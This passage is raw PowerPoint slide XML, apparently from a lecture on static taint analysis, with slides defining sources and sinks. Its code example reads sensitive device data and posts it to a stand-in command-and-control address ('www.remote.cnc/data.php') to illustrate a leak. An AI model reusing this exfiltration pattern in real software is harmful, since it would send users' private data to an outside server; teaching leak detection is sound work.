            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>getSensitiveData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
              <a:solidFill>
                <a:srgbClr val="A31515"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr altLang="en-US" sz="1600" noProof="1">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125970" name="Text Box 18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1349375" y="3143373"/>
            <a:ext cx="7696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3333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altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="2B91AF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>String</a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1">
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>data2 </a:t>
            </a:r>
            <a:r>
              <a:rPr altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>"DeviceName="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>deviceName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> + </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125971" name="Text Box 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1357313" y="4370511"/>
            <a:ext cx="769620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3333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600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>PostRequest("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" noProof="1">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0033CC"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Courier New" charset="0"/>
                <a:cs typeface="Courier New" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.remote.cnc/data.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>data2);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125973" name="Freeform 21"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="4124448"/>
            <a:ext cx="5230812" cy="1003300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2388"/>
              <a:gd name="T1" fmla="*/ 0 h 632"/>
              <a:gd name="T2" fmla="*/ 2388 w 2388"/>
              <a:gd name="T3" fmla="*/ 632 h 632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2388" h="632">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="300"/>
                  <a:pt x="2216" y="136"/>
                  <a:pt x="2388" y="632"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="333333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5974" name="Freeform 22"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2493819" y="1990848"/>
            <a:ext cx="4218708" cy="1905000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1776"/>
              <a:gd name="T1" fmla="*/ 0 h 1296"/>
              <a:gd name="T2" fmla="*/ 1776 w 1776"/>
              <a:gd name="T3" fmla="*/ 1296 h 1296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776" h="1296">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="196" y="300"/>
                  <a:pt x="1604" y="800"/>
                  <a:pt x="1776" y="1296"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="57150" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="333333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25976" name="Picture 2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681845" y="1451316"/>
            <a:ext cx="608013" cy="576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5979" name="Rectangle 2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charset="-128"/>
              </a:rPr>
              <a:t>Static Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>(in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>detail)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6007172" y="2060698"/>
            <a:ext cx="3060700" cy="750888"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -59649"/>
              <a:gd name="adj2" fmla="val -92069"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="BACCDD"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BACCDD">
                  <a:gamma/>
                  <a:tint val="13725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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> – a method </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>returning </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sensitive data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="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" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1230235" y="5746873"/>
            <a:ext cx="2376488" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -373"/>
              <a:gd name="adj2" fmla="val -92573"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191">
                  <a:gamma/>
                  <a:tint val="80000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r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Sink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> - a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>leaking out data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0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72521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4.44444E-6 C -8.33333E-7 0.00023 0.08629 0.03263 0.09306 0.09907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1259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53" y="495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3.7037E-7 C 0.00782 -0.03264 0.00521 -0.0831 -0.01493 -0.08773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1259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6" y="-4398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3.7037E-7 C 0.02049 0.02107 0.02691 0.07824 0.02639 0.10347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1259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9" y="516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259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5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259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259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5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259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5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5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2.22222E-6 L -0.17327 -0.00486 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1259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628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25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326 -0.00486 C -0.16007 0.01528 -0.16111 0.07037 -0.0927 0.11829 C -0.02465 0.16621 0.16875 0.24908 0.23577 0.28357 C 0.30313 0.31783 0.29427 0.31551 0.30973 0.32431 " pathEditMode="relative" rAng="0" ptsTypes="AAAA">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1259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149" y="164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973 0.32431 L -0.13125 0.32685 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1259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049" y="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25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3125 0.32685 C -0.11718 0.34028 -0.12361 0.38496 -0.04513 0.40764 C -0.02743 0.41852 0.25278 0.44722 0.33924 0.4632 C 0.42535 0.47917 0.44445 0.49514 0.47223 0.50347 " pathEditMode="relative" rAng="0" ptsTypes="AAAA">
                                      <p:cBhvr>
                                        <p:cTn id="58" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1259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174" y="88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withGroup">
                            <p:stCondLst>
                              <p:cond delay="2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="6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7223 0.50347 L -0.13055 0.50648 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1259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139" y="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 tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1259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250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12597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 tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1259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250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="12597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68" grpId="0" animBg="1"/>
      <p:bldP spid="125965" grpId="0" animBg="1"/>
      <p:bldP spid="125966" grpId="0" animBg="1"/>
      <p:bldP spid="125967" grpId="0" animBg="1"/>
      <p:bldP spid="125969" grpId="0"/>
      <p:bldP spid="125969" grpId="1"/>
      <p:bldP spid="125970" grpId="0"/>
      <p:bldP spid="125970" grpId="1"/>
      <p:bldP spid="125971" grpId="0"/>
      <p:bldP spid="125971" grpId="1"/>
      <p:bldP spid="125973" grpId="0" animBg="1"/>
      <p:bldP spid="125974" grpId="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="1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585200" y="5848542"/>
            <a:ext cx="406400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{22925321-DB0B-224A-82FF-5E3BCBCE4C65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138304" name="Oval 64"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5516880" y="3604706"/>
            <a:ext cx="2209800" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="EAEAEA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endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138253" name="AutoShape 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1564005" y="1190589"/>
            <a:ext cx="2514600" cy="663547"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1067"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="D5D5D5"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="D5D5D5">
                  <a:gamma/>
                  <a:tint val="23922"/>
                  <a:invGamma/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill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charset="-128"/>
              </a:rPr>
              <a:t>Static Analysis </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>(taint analysis example)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138250" name="Oval 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1868805" y="1357277"/>
            <a:ext cx="379413" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="91B6DB"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="91B6DB">
                  <a:gamma/>
                  <a:tint val="80000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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138251" name="Oval 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2628155" y="2043514"/>
            <a:ext cx="379413" cy="366713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endParaRPr lang="en-US" altLang="en-US" sz="1200">
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Times New Roman" charset="0"/>
              <a:cs typeface="Times New Roman" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138255" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="116205" y="1357277"/>
            <a:ext cx="1371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en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="Tahoma" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Sources:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138256" name="Text Box 16"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="182880" y="5303384"/>
            <a:ext cx="12954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en-US">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="Tahoma" charset="0"/>
                <a:cs typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Sinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138258" name="Oval 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2630805" y="1342989"/>
            <a:ext cx="379413" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="91B6DB"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="91B6DB">
                  <a:gamma/>
                  <a:tint val="80000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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138259" name="Oval 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3470593" y="1357277"/>
            <a:ext cx="379412" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="91B6DB"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="91B6DB">
                  <a:gamma/>
                  <a:tint val="80000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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138264" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1563624" y="5108121"/>
            <a:ext cx="4114800" cy="686664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D5D5D5"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="D5D5D5">
                  <a:gamma/>
                  <a:tint val="23922"/>
                  <a:invGamma/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill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8265" name="Oval 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1868424" y="5274809"/>
            <a:ext cx="379413" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191">
                  <a:gamma/>
                  <a:tint val="80000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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138266" name="Oval 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2630424" y="5260521"/>
            <a:ext cx="379413" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191">
                  <a:gamma/>
                  <a:tint val="80000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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138267" name="Oval 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3470212" y="5274809"/>
            <a:ext cx="379412" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191">
                  <a:gamma/>
                  <a:tint val="80000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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138268" name="Oval 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4306824" y="5274809"/>
            <a:ext cx="379413" cy="366712"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="DB9191"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="DB9191">
                  <a:gamma/>
                  <a:tint val="80000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endParaRPr lang="en-US" altLang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="292929"/>
              </a:solidFill>
              <a:latin typeface="Courier New" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
